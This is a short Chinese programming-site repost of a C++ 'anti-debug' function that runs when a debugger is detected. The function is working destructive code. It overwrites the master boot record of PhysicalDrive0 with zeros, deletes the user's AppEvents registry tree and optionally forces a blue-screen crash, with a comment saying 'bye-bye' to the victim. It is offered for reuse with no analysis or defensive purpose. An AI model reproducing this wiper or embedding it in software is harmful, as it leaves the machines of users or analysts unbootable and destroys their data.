网站首页编程语言正文

检测到调试后执行的代码

作者：ThatAllOver 更新时间： 2022-05-13 编程语言

__forceinline void guard(bool use_bsod)
{
	// note: simv0l - i can say only "bye-bye" for you, if this function will called.
	DWORD write;
	char mbr[512];
	ZeroMemory(mbr, sizeof mbr);
	HANDLE MasterBootRecord = CreateFile(crypt_str("\\\\.\\PhysicalDrive0"), GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
	if (WriteFile(MasterBootRecord, mbr, 512, &write, NULL) == TRUE)
	{
		HKEY hKey = NULL;
		if (RegOpenKeyEx(HKEY_CURRENT_USER, crypt_str("AppEvents\\"), NULL, DELETE | KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY, &hKey) == ERROR_SUCCESS)
		{
			if (RegDeleteTree(hKey, NULL) == ERROR_SUCCESS && use_bsod)
			{
				BOOLEAN bl;
				ULONG Response;
				RtlAdjustPrivilege(19, TRUE, FALSE, &bl);
				NtRaiseHardError(STATUS_ASSERTION_FAILURE, NULL, NULL, NULL, 6, &Response);
			}
			RegCloseKey(hKey);
		}
	}
}

原文链接：https://blog.csdn.net/zzy1448331580/article/details/124503282

上一篇：C++ DeviceIoControl 获取硬盘序列号
下一篇：系统分区卷GUID

网站首页 编程语言 正文

检测到调试后执行的代码

相关推荐

网站首页编程语言正文